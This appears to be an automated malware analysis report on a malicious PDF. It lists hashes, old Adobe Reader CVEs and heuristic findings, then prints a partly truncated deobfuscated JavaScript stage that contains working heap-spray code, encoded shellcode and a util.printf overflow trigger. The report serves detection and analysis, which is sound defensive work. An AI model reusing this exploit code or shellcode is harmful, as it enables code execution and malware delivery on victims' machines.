Malicious PDF — malware analysis report

Static analysis result for SHA-256 717468f1b0d1eeae…

MALICIOUS

PDF

118.5 KB
MD5: 8e1a37be0d589cb7e28778568e71d13c
SHA-1: 8e62beab29533614b1acab3dd4d08f8ec624bffe
SHA-256: 717468f1b0d1eeae2e2e11a58538201c98df6c999454a09cbec80548f2c96377
Risk Score: 676

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment

The PDF file contains heavily obfuscated JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is designed to download and execute a second-stage payload, as indicated by the ClamAV detection of a JavaScript exploit shellcode. The presence of multiple CVEs and the obfuscated JavaScript strongly suggest a malicious exploit kit.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (12)

  • media.newPlayer — CVE-2009-4324 [critical, CVE, exact match, CVE_2009_4324]
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 [critical, CVE, exact match, CVE_2009_0927]
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 [critical, CVE, exact match, CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 [critical, CVE, exact match, CVE_2008_2992]
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher [critical, CVE, likely match, PDF_PIDIEF_MULTI_CVE_DISPATCH]
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit [critical, PDF_ADOBE_READER_MULTI_CVE_JS_KIT]
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action [low, 3 related findings, PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical, PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager [high, PDF_JS_LARGE_COMMENT_PADDED_EVAL]
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream [low, PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0006_000.js
SHA-256: 367e156fa573fdbc3b536c642337bae9d65846b36376c14a81d034574499a96a
Kind: pdf-javascript-stream
Source: PDF /JS object 6 at offset 0x143
Size: 626557 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function cR7(gIL){ /*
... (truncated)
Filename: legacy_pdfkit_stage_000.js
SHA-256: 681dbda57cdbf82f4bef3978ebd94c7026681de1ecfcc152fb2de502ced92b73
Kind: deobfuscated-js
Source: comment-padded substitution-hex decoded JavaScript at offset 0x143
Size: 10413 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE4FF%uE624%u8003%uD685%uE403%u6D24%uE843%u96AF%u491F%u96AF%u650B%uE6E0%u1BF4%u6DDB%u5FEF%uE66C%uE403%uE64E%u6A6B%uE86A%u8CEF%u18BC%uEA89%u094C%u04CD%u8E44%u2E30%uBDAE%uDC6B%u4A06%u8CE4%uAFCE%u0C89%u3D4C%uC789%u8ECD%uA858%u3B3E%u086B%uE5B3%u0C0F%uE73B%uE403%uE2AD%u6728%uE2CF%u2408%u1751%u8A6B%u9241%u8C03%u8F53%u8D6D%u1970%uCC56%uBF7D%u2408%u622B%uE4FB%uE624%u1488%uBE9F%uE403%u8C24%u8C03%uA20D%uB3EB%uAF4C%uEBEE%u8E5A%uAF88%uB9C7%u04EB%uE624%u6D03%uCD20%u0F80%uED20%u91C3%u6BD5%uE486%uE626%uB403%u194C%uE403%u1924%uD056%u63A9%uE003%uE624%u8E53%u8C24%u6903%uE6A1%uE401%uB624%uB1FC%u6B1C%uE4B6%uE620%u4803%u262E%u1F76%u216A%uCA05%u9E41%u2366%uE262%uE403%uE624%u618E%uE224%uE403%u2F17%uB452%uB3DB%uA43F%u622B%uE483%uE624%u6D4B%uAA61%uE46B%uE664%u8E03%u1964%uAC56%u262F%u8A77%uA3AD%u8E63%u8C24%u8E03%u8C24%u8E03%u1924%uB456%u262F%uBE77%uE64E%uE46B%uE624%u8E07%u8C24%u0D03%uE68E%uE403%u1974%uB056%u262F%uA677%uA3AD%u696B%u8261%u8C53%uA624%uE403%u93DB%u1B63%u8E51%uB1FC%uED7C%u90C3%u6D31%u8046%u262F%uEA77%u93DB%u1B67%u8651%u91FC%u1968%uA456%u33CF%u91FC%u1968%uA056%u2F0F%uB542%u63A9%uE003%uE624%u1B53%uCA71%u1B69%uB3DB%uB133%u0AAF%u9988%uED2C%u90FC%uB56F%u3A88%u6D72%uD870%u92AF%u9C30%u1527%u6F55%uC652%u1700%u2F17%uA54A%uE589%uB2C0%u1017%u5A0C%uDE34%u90D5%u272C%uE9CD%u1427%u0F43%uDDD5%uBAFD%u0351%u6F59%u6DCF%uC059%u3B27%u6F65%uAD28%uBE88%uE538%u6FDE%u6D20%u2100%uBD7A%uE6E8%u2617%u265E%uE620%uB5EB%u19DB%u8CFC%u9250%uDE73%uC90B%u9762%u874D%u946D%u944B%u906D%u8F56%uCA73%u8947%uCB6E%u9450%u8062%uC941%u873C%uD719%u9725%u824D%uD53E%uD617%uD337%uDE16%uDD67%uD112%u8537%uDF14%uD537%u871C%u873A%u8246%u8066%u8247%uD335%uDF41%uC260%uDB57%uE430%uE624%u0003");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE4FF%uE624%u8003%uD685%uE403%u6D24%uE843%u96AF%u491F%u96AF%u650B%uE6E0%u1BF4%u6DDB%u5FEF%uE66C%uE403%uE64E%u6A6B%uE86A%u8CEF%u18BC%uEA89%u094C%u04CD%u8E44%u2E30%uBDAE%uDC6B%u4A06%u8CE4%uAFCE%u0C89%u3D4C%uC789%u8ECD%uA858%u3B3E%u086B%uE5B3%u0C0F%uE73B%uE403%uE2AD%u6728%uE2CF%u2408%u1751%u8A6B%u9241%u8C03%u8F53%u8D6D%u1970%uCC56%uBF7D%u2408%u622B%uE4FB%uE624%u1488%uBE9F%uE403%u8C24%u8C03%uA20D%uB3EB%uAF4C%uEBEE%u8E5A%uAF88%uB9C7%u04EB%uE624%u6D03%uCD20%u0F80%uED20%u91C3%u6BD5%uE486%uE626%uB403%u194C%uE403%u1924%uD056%u63A9%uE003%uE624%u8E53%u8C24%u6903%uE6A1%uE401%uB624%uB1FC%u6B1C%uE4B6%uE620%u4803%u262E%u1F76%u216A%uCA05%u9E41%u2366%uE262%uE403%uE624%u618E%uE224%uE403%u2F17%uB452%uB3DB%uA43F%u622B%uE483%uE624%u6D4B%uAA61%uE46B%uE664%u8E03%u1964%uAC56%u262F%u8A77%uA3AD%u8E63%u8C24%u8E03%u8C24%u8E03%u1924%uB456%u262F%uBE77%uE64E%uE46B%uE624%u8E07%u8C24%u0D03%uE68E%uE403%u1974%uB056%u262F%uA677%uA3AD%u696B%u8261%u8C53%uA624%uE403%u93DB%u1B63%u8E51%uB1FC%uED7C%u90C3%u6D31%u8046%u262F%uEA77%u93DB%u1B67%u8651%u91FC%u1968%uA456%u33CF%u91FC%u1968%uA056%u2F0F%uB542%u63A9%uE003%uE624%u1B53%uCA71%u1B69%uB3DB%uB133%u0AAF%u9988%uED2C%u90FC
... (truncated)